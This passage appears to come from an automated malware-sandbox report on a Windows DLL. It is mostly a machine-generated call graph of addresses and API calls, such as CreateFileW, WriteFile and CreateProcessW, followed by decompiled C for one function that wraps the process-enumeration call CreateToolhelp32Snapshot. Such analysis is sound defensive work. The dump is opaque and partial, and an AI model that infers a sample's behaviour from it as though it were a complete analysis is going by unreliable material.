7739 10004653 7738->7739 7740 1000afe0 2 API calls 7739->7740 7741 1000465e 7740->7741 7742 1000af60 2 API calls 7741->7742 7743 10004668 7742->7743 7744 100041b3 12 API calls 7743->7744 7745 10004673 7744->7745 7746 1000af60 2 API calls 7745->7746 7747 1000467d 7746->7747 7748 100041b3 12 API calls 7747->7748 7749 10004688 7748->7749 7750 1000af60 2 API calls 7749->7750 7751 10004692 7750->7751 7752 100041b3 12 API calls 7751->7752 7753 1000469d 7752->7753 7754 1000af60 2 API calls 7753->7754 7755 100046a7 7754->7755 7756 100041b3 12 API calls 7755->7756 7757 100046b2 7756->7757 7758 1000af60 2 API calls 7757->7758 7759 100046bc 7758->7759 7760 100041b3 12 API calls 7759->7760 7761 100046c7 7760->7761 7762 1000af60 2 API calls 7761->7762 7763 100046d1 7762->7763 7764 1000afe0 2 API calls 7763->7764 7765 100046e1 7764->7765 7766 10004f02 7 API calls 7765->7766 7767 100046f9 7766->7767 7768 1000afe0 2 API calls 7767->7768 7769 10004704 7768->7769 7770 1000afe0 2 API calls 7769->7770 7771 10004710 7770->7771 7772 1000afe0 2 API calls 7771->7772 7773 1000471a 7772->7773 7774 1000afe0 2 API calls 7773->7774 7775 10004726 7774->7775 7776 1000afe0 2 API calls 7775->7776 7777 10004730 7776->7777 7778 10004f02 7 API calls 7777->7778 7779 10004748 7778->7779 7780 1000afe0 2 API calls 7779->7780 7781 10004753 7780->7781 7782 10004f02 7 API calls 7781->7782 7783 1000476b 7782->7783 7784 1000afe0 2 API calls 7783->7784 7785 10004776 7784->7785 7786 10004f02 7 API calls 7785->7786 7787 1000478e 7786->7787 7788 1000afe0 2 API calls 7787->7788 7789 10004799 7788->7789 7790 10004f02 7 API calls 7789->7790 7791 100047b1 7790->7791 7792 1000afe0 2 API calls 7791->7792 7793 100047bc 7792->7793 7794 10004f02 7 API calls 7793->7794 7795 100047d4 7794->7795 7796 1000af60 2 API calls 7795->7796 7797 100047df 7796->7797 7798 10007008 4 API calls 7797->7798 7799 100047ee 7798->7799 7800 10007008 4 API calls 7799->7800 7801 100047fd 7800->7801 7802 1000afe0 2 API calls 7801->7802 7803 1000480d 7802->7803 7804 1000afe0 2 API calls 7803->7804 7805 10004817 7804->7805 7806 10004f02 7 API calls 7805->7806 7807 1000482f 7806->7807 7808 100074c0 HeapReAlloc 7807->7808 7809 10004853 7808->7809 7810 10004f02 7 API calls 7809->7810 7811 1000486c 7810->7811 7812 100074c0 HeapReAlloc 7811->7812 7813 10004890 7812->7813 7814 10004f02 7 API calls 7813->7814 7815 100048a9 7814->7815 7816 1000afe0 2 API calls 7815->7816 7817 100048b4 7816->7817 7818 1000af60 2 API calls 7817->7818 7819 100048be 7818->7819 7820 10007008 4 API calls 7819->7820 7821 100048cd 7820->7821 7822 1000afe0 2 API calls 7821->7822 7823 100048dd 7822->7823 7824 10004f02 7 API calls 7823->7824 7825 100048f5 7824->7825 7826 1000afe0 2 API calls 7825->7826 7827 10004900 7826->7827 7828 1000af60 2 API calls 7827->7828 7829 1000490a 7828->7829 7830 1000afe0 2 API calls 7829->7830 7831 1000491a 7830->7831 7832 10004f02 7 API calls 7831->7832 7833 10004932 7832->7833 7834 1000afe0 2 API calls 7833->7834 7835 1000493d 7834->7835 7836 1000afe0 2 API calls 7835->7836 7837 10004947 7836->7837 7838 1000af60 2 API calls 7837->7838 7839 10004951 7838->7839 7840 1000afe0 2 API calls 7839->7840 7841 10004961 7840->7841 7842 10004f02 7 API calls 7841->7842 7843 10004979 7842->7843 7844 1000afe0 2 API calls 7843->7844 7845 10004984 7844->7845 7846 1000afe0 2 API calls 7845->7846 7847 10004990 7846->7847 7848 1000afe0 2 API calls 7847->7848 7849 1000499a 7848->7849 7850 1000afe0 2 API calls 7849->7850 7851 100049a6 7850->7851 7852 1000afe0 2 API calls 7851->7852 7853 100049b0 7852->7853 7854 1000af60 2 API calls 7853->7854 7855 100049ba 7854->7855 7856 1000afe0 2 API calls 7855->7856 7857 100049ca 7856->7857 7858 10004f02 7 API calls 7857->7858 7859 100049e2 7858->7859 7860 1000afe0 2 API calls 7859->7860 7861 100049ed 7860->7861 7862 1000afe0 2 API calls 7861->7862 7863 100049f7 7862->7863 7864 1000afe0 2 API calls 7863->7864 7865 10004a03 7864->7865 7866 1000afe0 2 API calls 7865->7866 7867 10004a0d 7866->7867 7868 1000afe0 2 API calls 7867->7868 7869 10004a19 7868->7869 7870 1000afe0 2 API calls 7869->7870 7871 10004a23 7870->7871 7872 10004f02 7 API calls 7871->7872 7873 10004a3b 7872->7873 7874 1000afe0 2 API calls 7873->7874 7875 10004a46 7874->7875 7876 1000afe0 2 API calls 7875->7876 7877 10004a52 7876->7877 7878 1000afe0 2 API calls 7877->7878 7879 10004a5c 7878->7879 7880 1000afe0 2 API calls 7879->7880 7881 10004a68 7880->7881 7882 1000afe0 2 API calls 7881->7882 7883 10004a72 7882->7883 7884 1000af60 2 API calls 7883->7884 7885 10004a7c 7884->7885 7886 10007008 4 API calls 7885->7886 7887 10004a8b 7886->7887 7888 10007008 4 API calls 7887->7888 7889 10004a9a 7888->7889 7890 10007008 4 API calls 7889->7890 7891 10004aa9 7890->7891 7892 10007008 4 API calls 7891->7892 7893 10004ab8 7892->7893 7894 10007008 4 API calls 7893->7894 7895 10004ac7 7894->7895 7896 1000afe0 2 API calls 7895->7896 7897 10004ad7 7896->7897 7898 10004f02 7 API calls 7897->7898 7899 10004aef 7898->7899 7900 1000afe0 2 API calls 7899->7900 7901 10004afa 7900->7901 7902 1000af60 2 API calls 7901->7902 7903 10004b04 7902->7903 7904 1000afe0 2 API calls 7903->7904 7905 10004b14 7904->7905 7906 10004f02 7 API calls 7905->7906 7907 10004b2c 7906->7907 7908 1000af60 2 API calls 7907->7908 7909 10004b37 7908->7909 7910 10008060 RtlAllocateHeap 7909->7910 7911 10004b51 7910->7911 7911->7603 7912 10008080 3 API calls 7911->7912 7913 10004b72 7912->7913 7914 10004b9a 7913->7914 7915 10007008 4 API calls 7913->7915 8637 100081d0 HeapFree 7914->8637 7917 10004b89 7915->7917 7918 100014c3 10 API calls 7917->7918 7918->7914 7920 10001151 7919->7920 7920->7920 7921 10007000 2 API calls 7920->7921 7922 1000116a 7921->7922 7923 10008060 RtlAllocateHeap 7922->7923 7930 10001189 7923->7930 7924 10001337 7925 1000af30 HeapFree 7924->7925 7927 1000134b 7925->7927 7926 10008060 RtlAllocateHeap 7928 100011f5 7926->7928 7927->6862 7927->6864 7929 10008060 RtlAllocateHeap 7928->7929 7931 10001203 7929->7931 7930->7924 7930->7926 7932 1000132e 7931->7932 7934 10004f02 7 API calls 7931->7934 8684 100081d0 HeapFree 7932->8684 7935 1000124e 7934->7935 7936 10008080 3 API calls 7935->7936 7937 10001268 7936->7937 7938 100012b7 7937->7938 7939 10004f02 7 API calls 7937->7939 7941 10001308 7938->7941 7943 10004d78 4 API calls 7938->7943 7940 1000129d 7939->7940 7942 10008080 3 API calls 7940->7942 8682 100081d0 HeapFree 7941->8682 7942->7938 7945 100012f0 7943->7945 7945->7941 7948 100014c3 10 API calls 7945->7948 7946 10001325 8683 100081d0 HeapFree 7946->8683 7948->7941 7950 10002cf6 7949->7950 7950->7950 7951 10007000 2 API calls 7950->7951 7952 10002d0f 7951->7952 8685 10001a1d 7952->8685 7955 1000af30 HeapFree 7956 10002d6a 7955->7956 7956->6862 7958 10004f02 7 API calls 7957->7958 7959 10004c51 7958->7959 7960 1000af60 2 API calls 7959->7960 7961 10004c5b 7960->7961 7962 1000301b 12 API calls 7961->7962 7963 10004c70 7962->7963 7964 10004c93 7963->7964 7965 10004c76 7963->7965 7966 10006c26 15 API calls 7964->7966 7967 10002d71 12 API calls 7965->7967 7970 10004cae 7966->7970 7968 10004c91 7967->7968 7969 10007008 4 API calls 7968->7969 7971 10004cf8 7969->7971 7970->7968 7972 10002d71 12 API calls 7970->7972 7973 10007008 4 API calls 7971->7973 7972->7968 7974 10004d09 7973->7974 7975 1000af30 HeapFree 7974->7975 7976 10004d13 7975->7976 7976->6818 7978 10004177 7977->7978 7979 100041a4 7978->7979 7980 1000419c CloseHandle 7978->7980 7979->6847 7980->7979 7985 100041c4 7981->7985 7983 100015cd 11 API calls 7983->7985 7984 1000af60 2 API calls 7984->7985 7985->7983 7985->7984 7986 10004258 7985->7986 8043 10002e57 7985->8043 8060 1000ad1f 7986->8060 7988 1000426b 7989 1000afe0 2 API calls 7988->7989 7990 1000427a 7989->7990 7991 10004292 7990->7991 7992 1000af60 2 API calls 7990->7992 7993 1000afe0 2 API calls 7991->7993 7992->7991 7994 100042a1 7993->7994 7995 1000af30 HeapFree 7994->7995 7996 100042c2 7995->7996 7996->7345 7998 10004f02 7 API calls 7997->7998 7999 100015f5 7998->7999 8000 1000af60 2 API calls 7999->8000 8010 100015ff 8000->8010 8001 10001672 8002 10007008 4 API calls 8001->8002 8003 10001688 8002->8003 8004 10007008 4 API calls 8003->8004 8006 10001697 8004->8006 8005 10007410 HeapReAlloc 8005->8010 8007 1000afe0 2 API calls 8006->8007 8008 100016a7 8007->8008 8011 100016c8 8008->8011 8012 1000af30 HeapFree 8008->8012 8009 1000afe0 wcslen HeapReAlloc 8009->8010 8010->8001 8010->8005 8010->8009 8016 1000af60 RtlAllocateHeap HeapReAlloc 8010->8016 8013 1000af30 HeapFree 8011->8013 8012->8011 8014 100016d1 8013->8014 8015 1000af30 HeapFree 8014->8015 8017 100016da 8015->8017 8016->8010 8017->7410 8019 1000818f 8018->8019 8020 10008097 8018->8020 8019->7354 8021 10008102 8020->8021 8022 100080da WideCharToMultiByte 8020->8022 8024 10008107 WideCharToMultiByte 8021->8024 8025 1000814a 8021->8025 8023 10008133 WideCharToMultiByte 8022->8023 8026 1000813f 8023->8026 8024->8023 8025->7354 8026->7354 8028 10007000 2 API calls 8027->8028 8029 100014d8 8028->8029 8030 10008060 RtlAllocateHeap 8029->8030 8031 100014f5 8030->8031 8032 100015b2 8031->8032 8033 10008080 3 API calls 8031->8033 8035 1000af30 HeapFree 8032->8035 8034 1000151a 8033->8034 8041 10001575 8034->8041 8070 100026a4 8034->8070 8036 100015c6 8035->8036 8036->7357 8076 100081d0 HeapFree 8041->8076 8042->7349 8044 10004f02 7 API calls 8043->8044 8045 10002e7c 8044->8045 8046 1000af60 2 API calls 8045->8046 8047 10002e86 8046->8047 8066 10007410 8047->8066 8049 10002eb0 8050 1000af60 2 API calls 8049->8050 8051 10002eba 8050->8051 8052 10007008 4 API calls 8051->8052 8053 10002ec8 8052->8053 8054 1000afe0 2 API calls 8053->8054 8055 10002ed8 8054->8055 8056 1000af30 HeapFree 8055->8056 8057 10002ef9 8056->8057 8058 1000af30 HeapFree 8057->8058 8059 10002f02 8058->8059 8059->7985 8062 1000ad39 8060->8062 8065 1000ad8a 8060->8065 8061 1000ad6b HeapReAlloc 8061->8065 8062->8061 8063 10012c67 HeapFree 8062->8063 8064 1000ad67 8062->8064 8063->8062 8064->8061 8065->7988 8067 1000742c 8066->8067 8068 1000b180 HeapReAlloc 8067->8068 8069 10007438 8068->8069 8069->8049 8071 100026b0 CreateFileW 8070->8071 8072 1000154d 8070->8072 8071->8072 8072->8041 8073 10002f06 8072->8073 8074 10002f12 WriteFile 8073->8074 8075 10002f36 8073->8075 8074->8075 8075->8041 8076->8032 8077->7434 8079 100033a2 8078->8079 8079->8079 8080 10008060 RtlAllocateHeap 8079->8080 8082 100033d5 8080->8082 8081 1000358c 8084 100035a9 8081->8084 8086 1000afe0 2 API calls 8081->8086 8082->8081 8083 10008060 RtlAllocateHeap 8082->8083 8085 10003440 8083->8085 8087 1000af30 HeapFree 8084->8087 8088 10008060 RtlAllocateHeap 8085->8088 8086->8084 8089 100035cb 8087->8089 8090 1000344e 8088->8090 8089->7601 8091 10003583 8090->8091 8093 10004f02 7 API calls 8090->8093 8650 100081d0 HeapFree 8091->8650 8094 10003499 8093->8094 8095 10008080 3 API calls 8094->8095 8096 100034b3 8095->8096 8097 10003502 8096->8097 8098 10004f02 7 API calls 8096->8098 8100 1000356a 8097->8100 8638 10004d78 8097->8638 8099 100034e8 8098->8099 8102 10008080 3 API calls 8099->8102 8648 100081d0 HeapFree 8100->8648 8102->8097 8104 1000357a 8649 100081d0 HeapFree 8104->8649 8107 100081f0 3 API calls 8108 10003560 8107->8108 8109 1000af60 2 API calls 8108->8109 8109->8100 8111 10005bb7 8110->8111 8111->8111 8112 10007000 2 API calls 8111->8112 8113 10005bd9 8112->8113 8114 10007008 4 API calls 8113->8114 8115 10005be8 8114->8115 8116 1000ab28 4 API calls 8115->8116 8123 10005c06 8116->8123 8117 10006bbc 8118 1000af30 HeapFree 8117->8118 8120 10006bde 8118->8120 8119 10005c55 8121 10004f02 7 API calls 8119->8121 8124 1000af30 HeapFree 8120->8124 8125 10005c75 8121->8125 8122 100041b3 12 API calls 8122->8123 8123->8117 8123->8119 8123->8122 8126 1000af60 2 API calls 8123->8126 8127 10006be7 8124->8127 8128 1000afe0 2 API calls 8125->8128 8126->8123 8129 1000af30 HeapFree 8127->8129 8130 10005c82 8128->8130 8131 10006bef 8129->8131 8132 10004f02 7 API calls 8130->8132 8133 1000af30 HeapFree 8131->8133 8134 10005c9a 8132->8134 8135 10006bf8 8133->8135 8136 1000afe0 2 API calls 8134->8136 8137 1000af30 HeapFree 8135->8137 8138 10005ca5 8136->8138 8139 10006c01 8137->8139 8140 10004f02 7 API calls 8138->8140 8141 1000af30 HeapFree 8139->8141 8142 10005cbd 8140->8142 8143 10006c0a 8141->8143 8144 1000afe0 2 API calls 8142->8144 8145 1000af30 HeapFree 8143->8145 8146 10005cc8 8144->8146 8148 10006c13 8145->8148 8147 1000afe0 2 API calls 8146->8147 8150 10005cd4 8147->8150 8149 1000acd3 2 API calls 8148->8149 8151 1000431c 8149->8151 8152 10004f02 7 API calls 8150->8152 8151->7608 8153 10005cec 8152->8153 8154 1000afe0 2 API calls 8153->8154 8155 10005cfa 8154->8155 8156 10004f02 7 API calls 8155->8156 8157 10005d12 8156->8157 8158 1000afe0 2 API calls 8157->8158 8159 10005d1d 8158->8159 8160 10004f02 7 API calls 8159->8160 8161 10005d35 8160->8161 8162 1000afe0 2 API calls 8161->8162 8163 10005d40 8162->8163 8164 1000afe0 2 API calls 8163->8164 8165 10005d4c 8164->8165 8166 10004f02 7 API calls 8165->8166 8167 10005d64 8166->8167 8168 1000afe0 2 API calls 8167->8168 8169 10005d72 8168->8169 8170 1000afe0 2 API calls 8169->8170 8171 10005d7e 8170->8171 8172 1000afe0 2 API calls 8171->8172 8173 10005d87 8172->8173 8174 1000afe0 2 API calls 8173->8174 8175 10005d93 8174->8175 8176 1000afe0 2 API calls 8175->8176 8177 10005d9c 8176->8177 8178 10004f02 7 API calls 8177->8178 8179 10005db4 8178->8179 8180 1000afe0 2 API calls 8179->8180 8181 10005dc2 8180->8181 8182 1000afe0 2 API calls 8181->8182 8183 10005dce 8182->8183 8184 1000afe0 2 API calls 8183->8184 8185 10005dd7 8184->8185 8186 1000afe0 2 API calls 8185->8186 8187 10005de3 8186->8187 8188 1000afe0 2 API calls 8187->8188 8189 10005dec 8188->8189 8190 10004f02 7 API calls 8189->8190 8191 10005e04 8190->8191 8192 1000af60 2 API calls 8191->8192 8193 10005e0f 8192->8193 8194 1000afe0 2 API calls 8193->8194 8195 10005e1f 8194->8195 8196 10004f02 7 API calls 8195->8196 8197 10005e37 8196->8197 8198 1000afe0 2 API calls 8197->8198 8199 10005e45 8198->8199 8200 1000afe0 2 API calls 8199->8200 8201 10005e51 8200->8201 8202 1000afe0 2 API calls 8201->8202 8203 10005e5a 8202->8203 8204 1000afe0 2 API calls 8203->8204 8205 10005e66 8204->8205 8206 1000afe0 2 API calls 8205->8206 8207 10005e6f 8206->8207 8208 10004f02 7 API calls 8207->8208 8209 10005e87 8208->8209 8210 1000afe0 2 API calls 8209->8210 8211 10005e95 8210->8211 8212 10004f02 7 API calls 8211->8212 8213 10005ead 8212->8213 8214 1000afe0 2 API calls 8213->8214 8215 10005ebb 8214->8215 8216 10004f02 7 API calls 8215->8216 8217 10005ed3 8216->8217 8218 1000afe0 2 API calls 8217->8218 8219 10005ee1 8218->8219 8220 10004f02 7 API calls 8219->8220 8221 10005ef9 8220->8221 8222 1000afe0 2 API calls 8221->8222 8223 10005f07 8222->8223 8224 1000afe0 2 API calls 8223->8224 8225 10005f13 8224->8225 8226 1000afe0 2 API calls 8225->8226 8227 10005f1c 8226->8227 8228 10004f02 7 API calls 8227->8228 8229 10005f34 8228->8229 8230 1000afe0 2 API calls 8229->8230 8231 10005f42 8230->8231 8232 10004f02 7 API calls 8231->8232 8233 10005f5a 8232->8233 8234 1000afe0 2 API calls 8233->8234 8235 10005f68 8234->8235 8236 10004f02 7 API calls 8235->8236 8237 10005f80 8236->8237 8238 1000af60 2 API calls 8237->8238 8239 10005f8b 8238->8239 8240 1000afe0 2 API calls 8239->8240 8241 10005f9b 8240->8241 8242 10004f02 7 API calls 8241->8242 8243 10005fb3 8242->8243 8244 1000afe0 2 API calls 8243->8244 8245 10005fc1 8244->8245 8246 10004f02 7 API calls 8245->8246 8247 10005fd9 8246->8247 8248 1000afe0 2 API calls 8247->8248 8249 10005fe7 8248->8249 8250 1000afe0 2 API calls 8249->8250 8251 10005ff3 8250->8251 8252 1000afe0 2 API calls 8251->8252 8253 10005ffc 8252->8253 8254 10004f02 7 API calls 8253->8254 8255 10006014 8254->8255 8256 1000afe0 2 API calls 8255->8256 8257 10006022 8256->8257 8258 10004f02 7 API calls 8257->8258 8259 1000603a 8258->8259 8260 1000afe0 2 API calls 8259->8260 8261 10006048 8260->8261 8262 1000afe0 2 API calls 8261->8262 8263 10006054 8262->8263 8264 1000afe0 2 API calls 8263->8264 8265 1000605d 8264->8265 8266 1000afe0 2 API calls 8265->8266 8267 10006069 8266->8267 8268 1000afe0 2 API calls 8267->8268 8269 10006072 8268->8269 8270 10004f02 7 API calls 8269->8270 8271 1000608a 8270->8271 8272 1000afe0 2 API calls 8271->8272 8273 10006098 8272->8273 8274 1000afe0 2 API calls 8273->8274 8275 100060a4 8274->8275 8276 1000afe0 2 API calls 8275->8276 8277 100060ad 8276->8277 8278 1000afe0 2 API calls 8277->8278 8279 100060b9 8278->8279 8280 1000afe0 2 API calls 8279->8280 8281 100060c2 8280->8281 8282 10004f02 7 API calls 8281->8282 8283 100060da 8282->8283 8284 1000afe0 2 API calls 8283->8284 8285 100060e8 8284->8285 8286 1000afe0 2 API calls 8285->8286 8287 100060f4 8286->8287 8288 1000afe0 2 API calls 8287->8288 8289 100060fd 8288->8289 8290 1000afe0 2 API calls 8289->8290 8291 10006109 8290->8291 8292 1000afe0 2 API calls 8291->8292 8293 10006112 8292->8293 8294 10004f02 7 API calls 8293->8294 8295 1000612a 8294->8295 8296 1000af60 2 API calls 8295->8296 8297 10006135 8296->8297 8298 1000afe0 2 API calls 8297->8298 8299 10006145 8298->8299 8300 10004f02 7 API calls 8299->8300 8301 1000615d 8300->8301 8302 1000afe0 2 API calls 8301->8302 8303 1000616b 8302->8303 8304 1000afe0 2 API calls 8303->8304 8305 10006177 8304->8305 8306 1000afe0 2 API calls 8305->8306 8307 10006180 8306->8307 8308 1000afe0 2 API calls 8307->8308 8309 1000618c 8308->8309 8310 1000afe0 2 API calls 8309->8310 8311 10006195 8310->8311 8312 10004f02 7 API calls 8311->8312 8313 100061ad 8312->8313 8314 1000afe0 2 API calls 8313->8314 8315 100061bb 8314->8315 8316 10004f02 7 API calls 8315->8316 8317 100061d3 8316->8317 8318 1000afe0 2 API calls 8317->8318 8319 100061e1 8318->8319 8320 1000afe0 2 API calls 8319->8320 8321 100061ed 8320->8321 8322 1000afe0 2 API calls 8321->8322 8323 100061f6 8322->8323 8324 1000afe0 2 API calls 8323->8324 8325 10006202 8324->8325 8326 1000afe0 2 API calls 8325->8326 8327 1000620b 8326->8327 8328 10004f02 7 API calls 8327->8328 8329 10006223 8328->8329 8330 1000afe0 2 API calls 8329->8330 8331 10006231 8330->8331 8332 1000afe0 2 API calls 8331->8332 8333 1000623d 8332->8333 8334 1000afe0 2 API calls 8333->8334 8335 10006246 8334->8335 8336 1000afe0 2 API calls 8335->8336 8337 10006252 8336->8337 8338 1000afe0 2 API calls 8337->8338 8339 1000625b 8338->8339 8340 10004f02 7 API calls 8339->8340 8341 10006273 8340->8341 8342 1000afe0 2 API calls 8341->8342 8343 10006281 8342->8343 8344 1000afe0 2 API calls 8343->8344 8345 1000628d 8344->8345 8346 1000afe0 2 API calls 8345->8346 8347 10006296 8346->8347 8348 1000afe0 2 API calls 8347->8348 8349 100062a2 8348->8349 8350 1000afe0 2 API calls 8349->8350 8351 100062ab 8350->8351 8352 10004f02 7 API calls 8351->8352 8353 100062c3 8352->8353 8354 1000afe0 2 API calls 8353->8354 8355 100062d1 8354->8355 8356 1000afe0 2 API calls 8355->8356 8357 100062dd 8356->8357 8358 1000afe0 2 API calls 8357->8358 8359 100062e6 8358->8359 8360 1000afe0 2 API calls 8359->8360 8361 100062f2 8360->8361 8362 1000afe0 2 API calls 8361->8362 8363 100062fb 8362->8363 8364 10004f02 7 API calls 8363->8364 8365 10006313 8364->8365 8366 1000af60 2 API calls 8365->8366 8367 1000631e 8366->8367 8368 1000afe0 2 API calls 8367->8368 8369 1000632e 8368->8369 8370 1000afe0 2 API calls 8369->8370 8371 1000633b 8370->8371 8372 10004f02 7 API calls 8371->8372 8373 10006353 8372->8373 8374 1000afe0 2 API calls 8373->8374 8375 10006361 8374->8375 8376 1000afe0 2 API calls 8375->8376 8377 1000636d 8376->8377 8378 1000afe0 2 API calls 8377->8378 8379 10006376 8378->8379 8380 1000afe0 2 API calls 8379->8380 8381 10006382 8380->8381 8382 1000afe0 2 API calls 8381->8382 8383 1000638b 8382->8383 8384 10004f02 7 API calls 8383->8384 8385 100063a3 8384->8385 8386 1000afe0 2 API calls 8385->8386 8387 100063b1 8386->8387 8388 10004f02 7 API calls 8387->8388 8389 100063c9 8388->8389 8390 1000afe0 2 API calls 8389->8390 8391 100063d7 8390->8391 8392 1000afe0 2 API calls 8391->8392 8393 100063e3 8392->8393 8394 1000afe0 2 API calls 8393->8394 8395 100063ec 8394->8395 8396 10004f02 7 API calls 8395->8396 8397 10006404 8396->8397 8398 1000afe0 2 API calls 8397->8398 8399 10006412 8398->8399 8400 10004f02 7 API calls 8399->8400 8401 1000642a 8400->8401 8402 1000afe0 2 API calls 8401->8402 8403 10006438 8402->8403 8404 10004f02 7 API calls 8403->8404 8405 10006450 8404->8405 8406 1000afe0 2 API calls 8405->8406 8407 1000645e 8406->8407 8408 10004f02 7 API calls 8407->8408 8409 10006476 8408->8409 8410 1000afe0 2 API calls 8409->8410 8411 10006484 8410->8411 8412 10004f02 7 API calls 8411->8412 8413 1000649c 8412->8413 8414 1000afe0 2 API calls 8413->8414 8415 100064aa 8414->8415 8416 10004f02 7 API calls 8415->8416 8417 100064c2 8416->8417 8418 1000afe0 2 API calls 8417->8418 8419 100064d0 8418->8419 8420 1000afe0 2 API calls 8419->8420 8421 100064dc 8420->8421 8422 1000afe0 2 API calls 8421->8422 8423 100064e5 8422->8423 8424 10004f02 7 API calls 8423->8424 8425 100064fd 8424->8425 8426 1000afe0 2 API calls 8425->8426 8427 1000650b 8426->8427 8428 1000afe0 2 API calls 8427->8428 8429 10006517 8428->8429 8430 1000af60 2 API calls 8429->8430 8431 10006521 8430->8431 8432 1000afe0 2 API calls 8431->8432 8433 10006531 8432->8433 8434 10004f02 7 API calls 8433->8434 8435 10006549 8434->8435 8436 1000afe0 2 API calls 8435->8436 8437 10006557 8436->8437 8438 10004f02 7 API calls 8437->8438 8439 1000656f 8438->8439 8440 1000afe0 2 API calls 8439->8440 8441 1000657d 8440->8441 8442 10004f02 7 API calls 8441->8442 8443 10006595 8442->8443 8444 1000afe0 2 API calls 8443->8444 8445 100065a3 8444->8445 8446 10004f02 7 API calls 8445->8446 8447 100065bb 8446->8447 8448 1000afe0 2 API calls 8447->8448 8449 100065c9 8448->8449 8450 10004f02 7 API calls 8449->8450 8451 100065e1 8450->8451 8452 1000afe0 2 API calls 8451->8452 8453 100065ef 8452->8453 8454 10004f02 7 API calls 8453->8454 8455 10006607 8454->8455 8456 1000afe0 2 API calls 8455->8456 8457 10006615 8456->8457 8458 10004f02 7 API calls 8457->8458 8459 1000662d 8458->8459 8460 1000afe0 2 API calls 8459->8460 8461 1000663b 8460->8461 8462 10004f02 7 API calls 8461->8462 8463 10006653 8462->8463 8464 1000afe0 2 API calls 8463->8464 8465 10006661 8464->8465 8466 10004f02 7 API calls 8465->8466 8467 10006679 8466->8467 8468 1000af60 2 API calls 8467->8468 8469 10006684 8468->8469 8470 100035d1 13 API calls 8469->8470 8471 1000669f 8470->8471 8472 1000af60 2 API calls 8471->8472 8473 100066a9 8472->8473 8474 1000afe0 2 API calls 8473->8474 8475 100066b9 8474->8475 8476 10004f02 7 API calls 8475->8476 8477 100066d1 8476->8477 8478 1000afe0 2 API calls 8477->8478 8479 100066df 8478->8479 8480 10004f02 7 API calls 8479->8480 8481 100066f7 8480->8481 8482 1000afe0 2 API calls 8481->8482 8483 10006702 8482->8483 8484 1000afe0 2 API calls 8483->8484 8485 1000670c 8484->8485 8486 1000afe0 2 API calls 8485->8486 8487 10006716 8486->8487 8488 1000afe0 2 API calls 8487->8488 8489 10006722 8488->8489 8490 1000af60 2 API calls 8489->8490 8491 1000672c 8490->8491 8492 100035d1 13 API calls 8491->8492 8493 10006747 8492->8493 8494 1000af60 2 API calls 8493->8494 8495 10006751 8494->8495 8496 100074c0 HeapReAlloc 8495->8496 8497 10006774 8496->8497 8498 1000af60 2 API calls 8497->8498 8499 1000677e 8498->8499 8500 1000afe0 2 API calls 8499->8500 8501 1000678e 8500->8501 8502 1000afe0 2 API calls 8501->8502 8503 10006798 8502->8503 8504 1000af60 2 API calls 8503->8504 8505 100067a2 8504->8505 8506 10007008 4 API calls 8505->8506 8507 100067b1 8506->8507 8508 1000afe0 2 API calls 8507->8508 8509 100067c1 8508->8509 8510 10004f02 7 API calls 8509->8510 8511 100067d9 8510->8511 8512 1000afe0 2 API calls 8511->8512 8513 100067e7 8512->8513 8514 10004f02 7 API calls 8513->8514 8515 100067ff 8514->8515 8516 1000afe0 2 API calls 8515->8516 8517 1000680a 8516->8517 8656 10001fce 8517->8656 8520 1000afe0 2 API calls 8521 10006828 8520->8521 8522 1000afe0 2 API calls 8521->8522 8523 10006834 8522->8523 8524 1000af60 2 API calls 8523->8524 8525 1000683e 8524->8525 8526 10007008 4 API calls 8525->8526 8637->7603 8639 10004d8a 8638->8639 8640 1000353b 8638->8640 8641 10008060 RtlAllocateHeap 8639->8641 8640->8100 8640->8107 8642 10004d93 8641->8642 8642->8640 8643 10004e25 8642->8643 8651 100083a0 8642->8651 8655 100081d0 HeapFree 8643->8655 8646 10004e17 8654 100083c0 memcpy 8646->8654 8648->8104 8649->8091 8650->8081 8652 100083a8 HeapSize 8651->8652 8653 100083ba 8651->8653 8652->8646 8653->8646 8654->8643 8655->8640 8657 10001fd4 8656->8657 8657->8657 8658 10007000 2 API calls 8657->8658 8659 10001ff6 8658->8659 8660 10007000 2 API calls 8659->8660 8661 10002003 8660->8661 8662 100021b8 8661->8662 8681 1000203e 8661->8681 8663 1000afe0 2 API calls 8662->8663 8671 100021ad 8663->8671 8664 10002176 8665 10007008 4 API calls 8664->8665 8667 10002185 8665->8667 8666 1000af30 HeapFree 8668 100021e9 8666->8668 8669 1000afe0 2 API calls 8667->8669 8670 1000af30 HeapFree 8668->8670 8669->8671 8673 100021f2 8670->8673 8671->8666 8672 10007410 HeapReAlloc 8672->8681 8674 1000af30 HeapFree 8673->8674 8675 100021fa 8674->8675 8676 1000af30 HeapFree 8675->8676 8678 10002203 8676->8678 8677 100074c0 HeapReAlloc 8677->8681 8678->8520 8679 1000afe0 wcslen HeapReAlloc 8679->8681 8680 1000af60 RtlAllocateHeap HeapReAlloc 8680->8681 8681->8664 8681->8672 8681->8677 8681->8679 8681->8680 8682->7946 8683->7932 8684->7924 8686 10001a61 8685->8686 8687 10001a29 CreateProcessW 8685->8687 8686->7955 8687->8686 8689 10007000 2 API calls 8688->8689 8690 10005ab5 8689->8690 8691 10008060 RtlAllocateHeap 8690->8691 8692 10005ac6 8691->8692 8693 10007620 WideCharToMultiByte 8692->8693 8694 10005ad8 8693->8694 8695 10008060 RtlAllocateHeap 8694->8695 8703 10005ae9 8695->8703 8696 10005b7f 8701 1000af30 HeapFree 8696->8701 8697 10005b62 8697->8696 8699 1000afe0 2 API calls 8697->8699 8698 10005b50 8711 100081d0 HeapFree 8698->8711 8699->8696 8704 10005ba0 8701->8704 8702 10005b59 8712 100081d0 HeapFree 8702->8712 8703->8697 8703->8698 8706 10008350 2 API calls 8703->8706 8707 1000af30 HeapFree 8704->8707 8708 10005b46 8706->8708 8709 10002249 8707->8709 8710 1000af60 2 API calls 8708->8710 8709->6958 8710->8698 8711->8702 8712->8697

    Executed Functions

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 412 10001353-1000135d 413 10001377 412->413 414 1000135f-10001375 CreateToolhelp32Snapshot 412->414 415 10001379-1000137c 413->415 414->415
    C-Code - Quality: 64%
    			E10001353(int _a4, int _a8) {
    				char _v4;
    				void* _t5;
    
    				_push(0);
    				if( *0x100280b4 == 0) {
    					_t5 = 0;
    				} else {
    					_push( *0x100280b4);
    					_v4 = 0;
    					_t5 = CreateToolhelp32Snapshot(_a4, _a8);
    				}
    				return _t5;
    			}





    0x10001355
    0x1000135d
    0x10001377
    0x1000135f
    0x1000135f
    0x10001366
    0x10001371
    0x10001371
    0x1000137c

    APIs
